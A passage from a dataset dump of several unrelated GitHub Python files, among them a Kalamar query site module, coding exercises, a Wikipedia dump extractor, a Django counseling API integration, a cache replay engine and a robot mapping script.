QuerySelect, QueryChain, QueryOrder, QueryRange,\\\n QueryDistinct, QueryAggregate\n\nfrom .access_point import DEFAULT_PARAMETER\n\ndef _translate_request(request, aliases):\n \"\"\"Translate high-level ``request`` to low-level using ``aliases``.\"\"\"\n if isinstance(request, And):\n return And(*(_translate_request(req, aliases)\n for req in request.sub_requests))\n elif isinstance(request, Or):\n return Or(*(_translate_request(req, aliases)\n for req in request.sub_requests))\n elif isinstance(request, Not):\n return Not(_translate_request(request.sub_request, aliases))\n elif isinstance(request, Condition):\n name = repr(request.property)\n if name in aliases:\n # The complete path has already been selected,\n # Let's use the alias instead !\n new_name = aliases.get(name, name)\n request.property.name = new_name\n request.property.child_property = None\n return request\n elif name in aliases.values():\n return request\n elif \".\".join(name.split(\".\")[:-1] + [\"*\"]) in aliases:\n return request\n else:\n new_name = \"__%s\" % name.replace(\".\", \"_\")\n aliases[name] = new_name\n request.property.name = new_name\n request.property.child_property = None\n return request\n\n\ndef _delegate_to_acces_point(method_name, first_arg_is_a_request=False):\n \"\"\"Create a function delegating ``method_name`` to an access point.\"\"\"\n if first_arg_is_a_request:\n def wrapper(self, access_point_name, request=None, *args, **kwargs):\n \"\"\"Call ``access_point.method_name(request, *args, **kwargs)``.\"\"\"\n access_point = self.access_points[access_point_name]\n request = normalize(access_point.properties, request)\n return getattr(access_point, method_name)(request, *args, **kwargs)\n else:\n def wrapper(self, access_point_name, *args, **kwargs):\n \"\"\"Call ``access_point.method_name(*args, **kwargs)``.\"\"\"\n access_point = self.access_points[access_point_name]\n return getattr(access_point, method_name)(*args, **kwargs)\n # Redefining documentation and name of the wrappers\n # pylint: disable=W0622\n wrapper.__name__ = method_name\n wrapper.__doc__ = \\\n \"Call :meth:`kalamar.access_point.AccessPoint.%s`.\" % method_name\n # pylint: enable=W0622\n return wrapper\n\n\nclass Site(object):\n \"\"\"Kalamar site.\"\"\"\n def __init__(self):\n self.access_points = {}\n self.logger = logging.getLogger(\"dyko\")\n try:\n from logging import NullHandler\n except ImportError:\n class NullHandler(logging.Handler):\n def emit(self, record):\n pass\n self.logger.addHandler(NullHandler())\n\n def register(self, name, access_point):\n \"\"\"Add an access point to this site.\n\n :param name: Identifier string of the added access point.\n :param access_point: Concrete subclass of :class:`AccessPoint`.\n\n \"\"\"\n if name in self.access_points:\n raise RuntimeError(\n \"Site already has an access point named %r.\" % name)\n self.access_points[name] = access_point\n access_point.bind(self, name)\n\n def view(self, access_point_name, aliases=None, request=None, order_by=None,\n select_range=None, distinct=False, aggregate=None, query=None):\n \"\"\"Call :meth:`kalamar.access_point.AccessPoint.view`.\n\n If ``alias`` and ``request`` are given, a query is created from them.\n\n The query is then validated and then passed to the ``view`` method of\n the acess point called ``access_point_name``.\n\n \"\"\"\n access_point = self.access_points[access_point_name]\n if aliases is None:\n aliases = {\"\": \"*\"}\n if query is None:\n # Add dummy selects to be able to filter on those\n chain = []\n aliases = 
dict(((value, key) for key, value in aliases.items()))\n request = make_request(request)\n request = _translate_request(request, aliases)\n aliases = dict(((value, key) for key, value in aliases.items()))\n chain.append(QuerySelect(aliases))\n chain.append(QueryFilter(request))\n if distinct:\n chain.append(QueryDistinct())\n if order_by is not None:\n chain.append(QueryOrder(order_by))\n if aggregate is not None:\n chain.append(QueryAggregate(aggregate))\n if select_range is not None:\n if hasattr(select_range, \"__iter__\"):\n select_range = slice(*select_range)\n else:\n select_range = slice(select_range)\n chain.append(QueryRange(select_range))\n query = QueryChain(chain)\n query.validate(access_point.properties)\n for line in access_point.view(query):\n for prop_name in [name for name in line if name.startswith(\"__\")]:\n line.pop(prop_name)\n yield line\n\n def from_repr(self, access_point_name, repr, default=DEFAULT_PARAMETER):\n \"\"\"\n Return an item of ``access_point_name`` from the ``repr`` string.\n ``repr`` should have been generated with item.__repr__()\n \"\"\"\n access_point = self.access_points[access_point_name]\n return access_point.loader_from_reference_repr(repr)(None)[0]\n\n create = _delegate_to_acces_point(\"create\")\n delete = _delegate_to_acces_point(\"delete\")\n delete_many = _delegate_to_acces_point(\"delete_many\", True)\n open = _delegate_to_acces_point(\"open\", True)\n search = _delegate_to_acces_point(\"search\", True)\n save = _delegate_to_acces_point(\"save\")\n","repo_name":"Kozea/Dyko","sub_path":"kalamar/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"3753054147","text":"#!/usr/bin/env python3\n\na = \"abaxyzzyxf\"\nb = \"noonabbad\"\n\ndef longestPalindrome(word:str)->str:\n \"\"\" Returns a string of longest possible palindrome \"\"\"\n\n try:\n \"\"\" What I'm thinking is creating a dictionary and storing each letter of the word\n provided in the argument. The letter will be the key and the number of times the\n letter appeared will be the value. \"\"\"\n\n palindromes = []\n mapping = {}\n for letter in word:\n if letter not in mapping:\n mapping[letter] = 1\n else:\n mapping[letter] += 1\n\n \"\"\" I'm thinking of removing the item in which the letter appeared only once. Because\n if it only appeared once it means it's either the middle letter of the palindrome or\n it's not included in the longest palindrome. \"\"\"\n\n for item in list(mapping):\n if mapping[item] < 2:\n mapping.pop(item)\n\n \"\"\" Creating a reversed word of the given argument will let me check the index number\n of the letter in a reversed order. \"\"\"\n\n letters = [letter for letter in word]\n letters.reverse()\n reversed_word = \"\".join(letters)\n\n \"\"\" We'll use the dictionary to get the index number of the first and last occurence\n of the letter which appeared multiple times in the provided argument. We use the provided\n argument to get the first occurence and the reversed word of the argument to get the last.\n Then we will slice the palindrome and store it to the list we initialized earlier. 
\"\"\"\n\n for key in mapping.keys():\n palindromes.append(word[word.index(key): -reversed_word.index(key)]) # add (-) to the reversed_word\n\n print(max(palindromes, key=len))\n return max(palindromes, key=len) # returns the largest\n\n except ValueError: # This line will catch invalid input.\n return \"Invalid input or no palindrome\"\n\n\n\nlongestPalindrome(a)\n","repo_name":"jetarciaga/solutions_engineer_repo","sub_path":"palindrome_level_2.py","file_name":"palindrome_level_2.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3414719400","text":"from subjects import subjects\n\nmarker_default = '✓'\nn_done = 41\n\nwith open(\"README.md\", mode='w') as f:\n f.write(\"# Image-Processing\\n\\n\")\n f.write(\"[画像処理100本ノック](https://qiita.com/yoyoyo_/items/2ef53f47f87dcf5d1e14)をやってみる。\\n\\n\")\n\n f.write(\"## 進捗\\n\\n\")\n f.write(\"| 番号 | 内容 | pyhtonの解答 | 出力画像 |\\n\")\n f.write(\"|:----:|:----:|:----:|:----:|\\n\")\n\n for i, subject in enumerate(subjects):\n marker = marker_default if i < n_done else \"\"\n link_code = \"[{}](https://github.com/HirokiNishimoto/Image_Processing/blob/master/solve_python/solve{}.py)\".format(marker, str(i+1).zfill(2))\n link_jpg = \"[{}](https://github.com/HirokiNishimoto/Image_Processing/blob/master/img/out/q_{}.jpg)\".format(marker, str(i+1).zfill(2))\n f.write(\"| {} | {} | {} | {} |\\n\".format(i+1, subject, link_code, link_jpg))\n\n f.write(\"\\n## 参考および引用元\\n[画像処理100本ノックを作ったった(Qiita)](https://qiita.com/yoyoyo_/items/2ef53f47f87dcf5d1e14)
[画像処理100本ノック!!(github)](https://github.com/yoyoyo-yo/Gasyori100knock)
\\n\")\n","repo_name":"nisshimo/Image_Processing","sub_path":"gen_readme.py","file_name":"gen_readme.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34593621791","text":"\"\"\"\nDownload it from here:\nhttps://dumps.wikimedia.org/backup-index.html\n\n\n\"\"\"\n\nimport os\n\nimport requests\nfrom gensim.corpora import WikiCorpus\nfrom tqdm import tqdm\n\n\ndef download_file(url, filename):\n response = requests.get(url, stream=True)\n\n total_size = int(response.headers.get(\"content-length\", 0))\n block_size = 1024\n t = tqdm(total=total_size, unit=\"B\", unit_scale=True, desc=filename)\n\n with open(filename, \"wb\") as f:\n for chunk in response.iter_content(chunk_size=block_size):\n if chunk:\n t.update(len(chunk))\n f.write(chunk)\n t.close()\n if total_size != 0 and t.n != total_size:\n print(\"ERROR, something went wrong\")\n\n\nurl = \"https://dumps.wikimedia.your.org/enwiki/20220820/enwiki-20220820-pages-articles-multistream.xml.bz2\"\nfilename = \"enwiki-20220820-pages-articles-multistream.xml.bz2\"\ndownload_file(url, filename)\n\n\ndef extract_text_from_wikipedia_dump(dump_file_path, output_file_path):\n \"\"\"\n Extract and save plain text from a Wikipedia dump.\n\n :param dump_file_path: path to the Wikipedia dump file (*.bz2 file)\n :param output_file_path: path to the output text file\n\n To run: extract_text_from_wikipedia_dump(\"enwiki-latest-pages-articles.xml.bz2\", \"wikipedia_plaintext.txt\")\n\n \"\"\"\n # Create a WikiCorpus object\n wiki = WikiCorpus(dump_file_path, dictionary={})\n\n # Open a file for writing extracted text\n with open(output_file_path, \"w\") as output_file:\n # Iterate over the texts from the dump file and write to the output file\n for i, text in enumerate(wiki.get_texts()):\n # Convert list of tokens to a single string and write to the output file\n output_file.write(\" \".join(text) + \"\\n\")\n\n # Optional: print progress every 10,000 articles\n if (i + 1) % 10000 == 0:\n print(f\"Processed {i + 1} articles\")\n\n print(\"Processing complete!\")\n","repo_name":"jss367/g3po","sub_path":"g3po/wiki_data.py","file_name":"wiki_data.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42604248018","text":"import json\nimport sqlite3\n\nfrom pr5.utils.generalPurposeReader import get_object_list\n\n\ndef connect_to_db(db):\n connection = sqlite3.connect(db)\n connection.row_factory = sqlite3.Row\n return connection\n\n\ndef create_table(db):\n cursor = db.cursor()\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS building_subitem (\n id INTEGER PRIMARY KEY ASC,\n id_building INTEGER REFERENCES building (id),\n name TEXT (255),\n place INTEGER,\n prise INTEGER\n )\n \"\"\")\n\n\ndef insert_subitem_data(db, data):\n cursor = db.cursor()\n cursor.executemany(\"\"\"\n INSERT INTO building_subitem (id_building, name, place, prise)\n VALUES(\n (SELECT id FROM building WHERE name = :name),\n :name, :place, :prise\n )\n \"\"\", data)\n\n db.commit()\n\n\ndef first_query(db, name):\n cursor = db.cursor()\n res = cursor.execute(\"\"\" \n SELECT * \n FROM building_subitem\n WHERE id_building = (SELECT id FROM building WHERE name = ?) 
\n \"\"\", [name])\n\n for row in res.fetchall():\n item = dict(row)\n print(item)\n\n cursor.close()\n return []\n\n\ndef second_query(db, name):\n cursor = db.cursor()\n res = cursor.execute(\"\"\" \n SELECT\n AVG(place) as avg_place, \n AVG(prise) as avg_prise\n FROM building_subitem\n WHERE id_building = (SELECT id FROM building WHERE name = ?) \n \"\"\", [name])\n\n print(dict(res.fetchone()))\n\n cursor.close()\n return []\n\n\ndef third_query(db, name):\n cursor = db.cursor()\n res = cursor.execute(\"\"\" \n SELECT *\n FROM building_subitem\n WHERE id_building = (SELECT id FROM building WHERE name = ?) \n ORDER BY prise DESC \n \"\"\", [name])\n\n for row in res.fetchall():\n print(dict(row))\n\n cursor.close()\n return []\n\n\nitems = get_object_list('./task_2_var_06_subitem.pkl')\ndatabase = connect_to_db(\"./results/first.db\")\ncreate_table(database)\n# insert_subitem_data(database, items)\nfirst_query(database, 'Дортмунд 1969')\nsecond_query(database, 'Гран-при ФИДЕ 1977')\nthird_query(database, 'Ставангер 1961')\n","repo_name":"daleunixal/data-engineering","sub_path":"pr4/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2429054977","text":"\"\"\" This module is used to facilitate points of integration with the Prompt API that are specific to\n the counseling platform.\n This includes\n 1) Pulling assignments and due dates from Prompt API\n\n Note that there is also Prompt API stuff in snusers (this is where UMS endpoints that Prompt uses\n to obtain user and org details exist)\n\"\"\"\nimport json\nimport requests\nimport sentry_sdk\nimport dateparser\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom snusers.models import Student\nfrom snusers.utilities.prompt_api_manager import PromptAPIManager\nfrom snuniversities.models import StudentUniversityDecision\nfrom sntasks.models import Task, TaskTemplate\n\nENDPOINT = \"/api/assignment-list/\" # Prepended by PROMPT_API_BASE; appended by student's UMS ID\nTEST_STUDENT_SLUG = \"ce80f4c6-57b4-45fe-8f11-87b23803eff6\"\nTEST_COUNSELOR_SLUG = \"d4daacd1-3ff8-4a5e-8e90-57bf5f3e7373\"\n\n\nclass CounselingPromptAPIManagerException(Exception):\n pass\n\n\nclass CounselingPromptAPIManager:\n def __init__(self):\n if not (settings.PROMPT_API_BASE and settings.PROMPT_API_TOKEN):\n raise CounselingPromptAPIManagerException(\"Missing Prompt API Details\")\n\n def update_assignment_tasks(self, student: Student):\n \"\"\" Pull assignments (with due dates) for a student from Prompt. 
Create tasks in UMS\n Returns queryset of student's Prompt Task obejcts\n \"\"\"\n # Obtain the tasks from prompt\n slug = str(student.slug) if not (settings.DEBUG or settings.TESTING) else TEST_STUDENT_SLUG\n school_list = list(\n student.student_university_decisions.filter(is_applying=StudentUniversityDecision.YES).values_list(\n \"university__iped\", flat=True\n )\n )\n response = requests.post(\n f\"{settings.PROMPT_API_BASE}{ENDPOINT}{slug}/\",\n json={\"schools\": school_list},\n headers={\"Authorization\": f\"Token {settings.PROMPT_API_TOKEN}\"},\n )\n if response.status_code == 404:\n # Try to obtain JWT for student, which creates their Prompt account if it doesn't exist\n prompt_user_api_manager = PromptAPIManager()\n prompt_user_api_manager.obtain_jwt(student)\n response = requests.post(\n f\"{settings.PROMPT_API_BASE}{ENDPOINT}{slug}/\",\n json={\"schools\": school_list},\n headers={\"Authorization\": f\"Token {settings.PROMPT_API_TOKEN}\"},\n )\n\n if response.status_code != 200:\n with sentry_sdk.configure_scope() as scope:\n scope.set_context(\n \"Prompt Assignment List Request\",\n {\"student\": slug, \"status\": response.status_code, \"response\": response.content},\n )\n ex = CounselingPromptAPIManagerException(\"Prompt API Error (AssignmentList)\")\n if settings.DEBUG or settings.TESTING:\n print(f\"Prompt API Manager response {response.status_code}\")\n print(response.content)\n else:\n sentry_sdk.capture_exception(ex)\n raise ex\n\n data = json.loads(response.content)\n for assignment in data[\"assignments\"]:\n # Create task due date\n task, _ = Task.objects.get_or_create(\n for_user=student.user, prompt_id=assignment[\"id\"], task_type=TaskTemplate.ESSAY\n )\n task.title = assignment[\"name\"]\n if len(assignment[\"ipeds\"]) == 1:\n task.student_university_decisions.set(\n list(student.student_university_decisions.filter(university__iped__in=assignment[\"ipeds\"]))\n )\n task.due = dateparser.parse(assignment[\"next_due_date\"]) if assignment.get(\"next_due_date\") else None\n\n # Tasks with due date need to be made visible to students so they appear in reminders\n task.visible_to_counseling_student = bool(task.due)\n\n task.completed = timezone.now() if assignment[\"marked_complete\"] else None\n task.save()\n\n # Delete all of the tasks that no longer come over from Prompt\n Task.objects.filter(task_type=TaskTemplate.ESSAY, for_user=student.user).exclude(prompt_id=\"\").exclude(\n prompt_id__in=[x[\"id\"] for x in data[\"assignments\"]]\n ).delete()\n\n return Task.objects.filter(for_user=student.user, task_type=TaskTemplate.ESSAY).exclude(prompt_id=\"\")\n","repo_name":"kkumarcodes/school-management","sub_path":"school-management/sncounseling/utilities/counseling_prompt_api_manager.py","file_name":"counseling_prompt_api_manager.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"14476553630","text":"class Livro:\n def __init__(self, titulo, autor, ano_publicacao):\n self.titulo = titulo\n self.autor = autor\n self.ano_publicacao = ano_publicacao\n self.disponivel = True\n\n def emprestar(self):\n if self.disponivel:\n self.disponivel = False\n print(f\"O livro '{self.titulo}' foi emprestado.\")\n else:\n print(f\"O livro '{self.titulo}' não está disponível para empréstimo.\")\n\n def devolver(self):\n if not self.disponivel:\n self.disponivel = True\n print(f\"O livro '{self.titulo}' foi devolvido.\")\n else:\n print(f\"O livro '{self.titulo}' já está 
disponível.\")\n\n def apresentar(self):\n status = \"Disponível\" if self.disponivel else \"Indisponível\"\n print(f\"Título: {self.titulo}\")\n print(f\"Autor: {self.autor}\")\n print(f\"Ano de Publicação: {self.ano_publicacao}\")\n print(f\"Status: {status}\")\n print()\n\n\nclass Biblioteca:\n def __init__(self):\n self.livros = []\n\n def adicionar_livro(self, livro):\n self.livros.append(livro)\n print(f\"O livro '{livro.titulo}' foi adicionado à biblioteca.\")\n\n def listar_livros(self):\n if len(self.livros) == 0:\n print(\"A biblioteca não possui livros.\")\n else:\n print(\"Livros disponíveis na biblioteca:\")\n for livro in self.livros:\n livro.apresentar()\n\n\n# Testando o sistema de biblioteca\nlivro1 = Livro(\"A Guerra dos Tronos\", \"George R.R. Martin\", 1996)\nlivro2 = Livro(\"O Senhor dos Anéis\", \"J.R.R. Tolkien\", 1954)\nlivro3 = Livro(\"Harry Potter e a Pedra Filosofal\", \"J.K. Rowling\", 1997)\n\nbiblioteca = Biblioteca()\n\nbiblioteca.adicionar_livro(livro1)\nbiblioteca.adicionar_livro(livro2)\nbiblioteca.adicionar_livro(livro3)\n\nlivro2.emprestar()\nlivro1.emprestar()\n\nbiblioteca.listar_livros()\n\nlivro2.devolver()\nlivro1.devolver()\n\nbiblioteca.listar_livros()\n","repo_name":"Angelotravain/LearningPython","sub_path":"2_Bimestre/Atividade_2.py","file_name":"Atividade_2.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18740015234","text":"from engines.replayengine import CachelineBase, CacheBase, PermutatorBase, ReplayEngineBase\nfrom mem.memoryoperations import TXStart, PMDKCall, TXEnd, Store, Flush, Fence\nfrom misc.utils import Rangeable, range_cmp\nfrom mem.cachenumbers import CACHELINE_BYTES, ATOMIC_WRITE_BYTES, get_cacheline_address\nfrom logging import getLogger\nimport csv\n\n# A YatCachelineBucket is an address range\n# It maintains a list of stores writing to this address range\nclass YatCachelineBucket(Rangeable):\n def __init__(self, address, size):\n self.address = address\n self.size = size\n self.stores_list = []\n\n def accept_store(self, store_op):\n self.stores_list.append(store_op)\n\n def accept_flush(self):\n for store_op in self.stores_list:\n store_op.flushed = 1\n\n def flush(self):\n #TODO need to write to the memory\n self.stores_list = \\\n list( filter(lambda x: x.flushed == 0, self.stores_list))\n\n def flush_all(self):\n #TODO need to write to the memory\n self.stores_list = []\n\n def is_empty(self):\n return len(self.stores_list) == 0\n\n def get_num_of_stores(self):\n return len(self.stores_list)\n\n def get_stores(self):\n return self.stores_list\n\n def get_base_address(self):\n return self.address\n\n def get_max_address(self):\n return self.address + self.size\n\n# A YatCacheline is a list of buckets\nclass YatCacheline(CachelineBase):\n def __init__(self, address, size, size_per_bucket):\n self.address = address\n self.size = size\n self.size_per_bucket = size_per_bucket\n self.num_of_buckets = int(size / size_per_bucket)\n self.buckets = []\n for index in range(0, self.num_of_buckets):\n bucket_address = self.address + index * size_per_bucket\n cacheline_bucket = YatCachelineBucket(bucket_address, size_per_bucket)\n self.buckets.append(cacheline_bucket)\n\n def get_bucket(self, store_op):\n for bucket in self.buckets:\n if range_cmp(bucket, store_op) == 0:\n assert(bucket.get_base_address() <= store_op.get_base_address())\n assert(bucket.get_max_address() >= store_op.get_max_address())\n return bucket\n return 
None\n\n    def can_accept_store(self, store_op):\n        if self.get_bucket(store_op) == None:\n            return False\n        else:\n            return True\n\n    def can_accept_flush(self, flush_op):\n        if self.address == flush_op.get_base_address() and \\\n           self.address + self.size == flush_op.get_max_address():\n            return True\n        else:\n            return False\n\n    def accept_store(self, store_op):\n        bucket = self.get_bucket(store_op)\n        assert(bucket != None)\n        bucket.accept_store(store_op)\n\n    def accept_flush(self):\n        for bucket in self.buckets:\n            bucket.accept_flush()\n\n    def flush(self):\n        for bucket in self.buckets:\n            bucket.flush()\n\n    def flush_all(self):\n        for bucket in self.buckets:\n            bucket.flush_all()\n\n    def is_empty(self):\n        for bucket in self.buckets:\n            if bucket.is_empty() == False:\n                return False\n        return True\n\n    def get_num_of_stores(self):\n        num_of_stores = 0\n        for bucket in self.buckets:\n            num_of_stores += bucket.get_num_of_stores()\n        return num_of_stores\n\n    def get_stores(self):\n        stores = []\n        for bucket in self.buckets:\n            stores.append(bucket.get_stores())\n        return stores\n\n# YatCache is a list of cacheline\nclass YatCache(CacheBase):\n    def __init__(self):\n        self.cachelines = []\n\n    def accept(self, op):\n        def accept_store(store_op):\n            cacheline = None\n            for cacheline_it in self.cachelines:\n                if (cacheline_it.can_accept_store(store_op)):\n                    cacheline = cacheline_it\n                    break\n            if cacheline == None:\n                address = get_cacheline_address(store_op.get_base_address())\n                cacheline = YatCacheline(address,\n                                         CACHELINE_BYTES,\n                                         ATOMIC_WRITE_BYTES)\n                self.cachelines.append(cacheline)\n            cacheline.accept_store(store_op)\n\n        def accept_flush(flush_op):\n            for cacheline in self.cachelines:\n                if (cacheline.can_accept_flush(flush_op)):\n                    cacheline.accept_flush()\n                    break\n\n        time_to_replay_and_flush = False\n        if isinstance(op, TXStart):\n            pass\n        elif isinstance(op, TXEnd):\n            pass\n        elif isinstance(op, PMDKCall):\n            pass\n        elif isinstance(op, Store):\n            accept_store(op)\n        elif isinstance(op, Flush):\n            accept_flush(op)\n        elif isinstance(op, Fence):\n            time_to_replay_and_flush = True\n        else:\n            # the original raised an undefined NotSupportedOperationException\n            raise NotImplementedError('unsupported operation: {}'.format(op))\n        return time_to_replay_and_flush\n\n    def flush(self):\n        empty_cachelines = []\n        for cacheline in self.cachelines:\n            cacheline.flush()\n            if cacheline.is_empty():\n                empty_cachelines.append(cacheline)\n        for cacheline in empty_cachelines:\n            self.cachelines.remove(cacheline)\n\n\n    def flush_all(self):\n        for cacheline in self.cachelines:\n            cacheline.flush_all()\n        self.cachelines = []\n\n    def get_cachelines(self):\n        return self.cachelines\n\n    def get_stores(self):\n        stores = []\n        for cacheline in self.cachelines:\n            stores.append(cacheline.get_stores())\n        return stores\n\nclass YatPermutator(PermutatorBase):\n    def __init__(self, cache):\n        self.cache = cache\n\n    # (size of CL + 1) * ... 
* (size of CL + 1) - 1\n def run(self):\n # Permute all stores in the cache\n permutation_count = 1\n for cacheline in self.cache.get_cachelines():\n num_of_stores = cacheline.get_num_of_stores()\n permutation_count *= num_of_stores + 1\n permutation_count -= 1\n return permutation_count\n\nclass YatEngine(ReplayEngineBase):\n # initialization\n def __init__(self):\n self.cache = YatCache()\n self.permutator = YatPermutator(self.cache)\n self.permutation_count_list = []\n self.permutation_count = 0\n\n # set the trace\n def set_trace(self, trace):\n self.trace = trace\n\n # traverse all the operations in the trace\n def run(self):\n # start from the first tx\n ops = self.trace.atomic_write_ops\n first_tx_start_index = self.trace.atomic_write_ops_tx_ranges[0][0]\n ops = ops[first_tx_start_index:]\n for op in ops:\n if isinstance(op, TXStart):\n self.permutation_count = 0\n if isinstance(op, TXEnd):\n self.permutation_count_list.append(self.permutation_count)\n if self.cache.accept(op) == True:\n getLogger().debug(\"Before Fence: \" +\n str(self.cache.get_stores()))\n self.permutation_count += self.permutator.run()\n self.cache.flush()\n getLogger().debug(\"After Fence: \" +\n str(self.cache.get_stores()))\n getLogger().debug(\"In the end: \" + str(self.cache.get_stores()))\n getLogger().debug(\"permutation_count_list = \" +\n str(self.permutation_count_list))\n\n self.epilogue()\n\n # write the result into a file\n def epilogue(self):\n with open('yat.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['op', 'per_op_count', \"total_count\"])\n op_count = 0\n total = 0\n for permutation_count in self.permutation_count_list:\n total += permutation_count\n writer.writerow([op_count, permutation_count, total])\n op_count += 1\n","repo_name":"cosmoss-jigu/witcher","sub_path":"replay/engines/yat/yatengine.py","file_name":"yatengine.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"5283204346","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = 'persona_app'\n\nurlpatterns = [\n path(\n '', \n views.InicioView.as_view(), \n name='Inicio'\n ),\n path(\n 'listar-todo-empleados/', \n views.ListAllEmpleado.as_view(),\n name = 'listar_empleado'\n ),\n path(\n 'lista-by-area//', \n views.ListByAreaEmpleado.as_view(),\n name= 'empleados_area'\n ),\n path(\"lista-by-trabajo//\", views.ListByBojEmpleado.as_view()),\n path(\"buscar-empleado/\", views.ListEmpleadosByKword.as_view()),\n path(\"listar-habilidades-empleado//\", views.ListHabilidadesEmpleado.as_view()),\n path(\n 'ver-empleado//', \n views.EmpleadoDetailView.as_view(),\n name='detalle_empleado'\n ),\n path(\n 'add-empleado/', \n views.EmpleadoCreateView.as_view(),\n name='registrar_empleado' \n ),\n path('success/', views.SuccessView.as_view(), name='correcto'),\n path(\n 'update-empleado//', \n views.EmpleadoUpdateView.as_view(), \n name='modificar_empleado',\n ),\n path(\n 'delete-empleado//', \n views.EmpleadoDeleteView.as_view(), \n name='eliminar_empleado',\n ),\n path(\n 'lista-empleado-admin/',\n views.ListAllEmpleadoAdmin.as_view(),\n name = 'lista_empleado_admin'\n )\n]\n","repo_name":"HectorLiAd/empleado","sub_path":"applications/persona/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24319010769","text":"import unittest\nfrom check_balanced import is_balanced\nfrom tree_node import TreeNode\n\nclass TestCheckBalanced(unittest.TestCase):\n def setUp(self):\n self.tree1 = TreeNode(1)\n self.tree1.left = TreeNode(2)\n self.tree1.right = TreeNode(3)\n self.tree1.left.left = TreeNode(4)\n self.tree1.left.right = TreeNode(5)\n self.tree1.right.left = TreeNode(6)\n self.tree1.right.right = TreeNode(7)\n\n self.tree2 = TreeNode(1)\n self.tree2.left = TreeNode(2)\n self.tree2.left.left = TreeNode(3)\n\n self.tree3 = TreeNode(1)\n\n def test_is_balanced(self):\n self.assertTrue(is_balanced(self.tree1))\n self.assertFalse(is_balanced(self.tree2))\n self.assertTrue(is_balanced(self.tree3))\n","repo_name":"weixuanteo/ctci-solutions","sub_path":"trees_graphs/tests/test_check_balanced.py","file_name":"test_check_balanced.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2594191479","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# from drive import RosAriaDriver\n# robot=RosAriaDriver('/PIONIER6')\n\nimport json\nimport time\nimport copy \nfrom OccupancyGrid import world_map\nimport PathPlanning as pp\nimport RobotControl\n\nscan = []\ntheta = []\ndata = list()\noutputPath = \"./output/\"\ninputPath = \"./datafiles/\"\n\n\ndef readJSON(filename):\n json_file = open(filename)\n data = json.load(json_file)\n return data\n\n\ndef saveJSON(filename, data):\n with open(filename, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef robotScanData():\n data = []\n for i in range(6):\n dataPoint = {}\n dataPoint['pose'] = robot.GetPose()\n dataPoint['scan'] = robot.ReadLaser()\n data.append(dataPoint)\n time.sleep(1)\n\n saveJSON(inputPath + \"robotScan.JSON\", data)\n\n\nif __name__ == '__main__':\n wm = world_map(20, 20, 0.1)\n wm.initialize_map()\n\n #data = readJSON(inputPath + \"robotTrap_01.JSON\")\n # data = readJSON(inputPath + \"map_boxes_0.json\")\n # data = readJSON(inputPath + \"map_boxes_1.json\")\n # data = readJSON(inputPath + \"map_round.json\")\n data = readJSON(inputPath + 
\"robotWandering_01.JSON\")\n\n for iteration in data:\n wm.updateHitCells(iteration)\n #print(iteration[u'pose'])\n # for i in range(3):\n # wm.updateHitCells(data[i])\n #print(data[-1][u'pose'])\n\n pp.robotRadius=0.05\n pp_wm=copy.deepcopy(wm)\n pp.enlargeObstacles(pp_wm)\n\t\n startPoint = [(x//pp_wm.cell_size)*pp_wm.cell_size for x in data[-1][u'pose'][0:2]]\n goalPoint = [(x//pp_wm.cell_size)*pp_wm.cell_size for x in data[0][u'pose'][0:2]]\n print(startPoint,goalPoint)\n\n RobotControl.ControlRobot(probabilityMap, robotPosition, goalPoint)\n \n WaveMap = pp.blastWave(pp_wm, startPoint, goalPoint)\n \t\n PathPoints = pp.findPathPoints(WaveMap, startPoint, goalPoint)\n print(PathPoints)\n wm.displayMap()\n pp.plotPathPoints(PathPoints,wm.plot)\n wm.plot.show()\n \n # Podczas skanowania w ruchu mogą pojawić się opóźnienia między getPose,a getScan, więć mapa może się troche rozjechac.\n # Lepiej np. wziąć pozycje przed skanem, skan, po skanie i estymować pozycję, w której był robiony skan.\n # Można też zrobić samemu subscribera do pozycji i skanów. Ten z RosAriaDriver czasem się nie nadaje.\n","repo_name":"Luny-S/MobileRobotics_Lab5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38379778055","text":"# Урок 4\n# Задание 1\n\nfrom sys import argv\nscript_name, pay_per_hour, hours, premium = argv\n\n\ndef calc_wage(pay_per_hour, hours, premium):\n wage = int(pay_per_hour) * int(hours) + int(premium)\n return wage\n\n\nprint(f\"Заработная плата сотрудника составляет {calc_wage(pay_per_hour, hours, premium)}\")\n\n# Задание 2\n\nmy_list = [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55]\nnew_list = [my_list[el] for el in range(1, len(my_list))\n if my_list[el]>my_list[el-1]\n ]\nprint(new_list)\n\n# Задание 3\n\n# считая, что \"в пределах от 20 